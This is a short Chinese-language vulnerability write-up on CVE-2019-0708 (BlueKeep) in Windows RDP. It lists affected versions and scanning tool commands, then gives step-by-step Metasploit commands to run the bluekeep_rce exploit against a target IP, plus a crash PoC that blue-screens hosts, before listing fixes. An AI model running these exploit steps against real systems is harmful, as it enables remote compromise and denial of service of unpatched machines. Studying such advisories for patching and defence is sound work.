漏洞说明

  2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。

漏洞影响版本

  • Windows 7
  • Windows server 2008 R2
  • Windows server 2008
  • Windows 2003
  • Windows xp

注:Windows 8和windows10以及之后的版本不受此漏洞影响

漏洞检测方式

CVE-2019-0708批量检测工具

1
2
pip install IPy
cve-2019-0708_v1.py -t ip -p port -f file

CVE-2019-0708检测工具

1
cve-2019-0708-scan.exe ip port

漏洞利用方式

1
2
3
4
5
6
7
8
9
10
root@root:~/桌面# msfconsole

msf5 > search cve_2019_0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOST IP
# 设置目标IP
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
# 3代表目标机器架构为VMware、2代表目标架构是virtulbox
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

可能会反弹shell,也有概率会使目标蓝屏

POC

1
2
3
pip install impacket

crashpoc.py 192.168.1.1 64 #python3 crashpoc.py ip地址 系统类型

执行POC会让目标蓝屏

漏洞修复方法

1.CVE-2019-0708补丁

2.安装安全管家类的软件

3.关闭远程桌面,开启防火墙

4.在远程设置里设置使用网络级别身份验证的远程桌面的计算机链接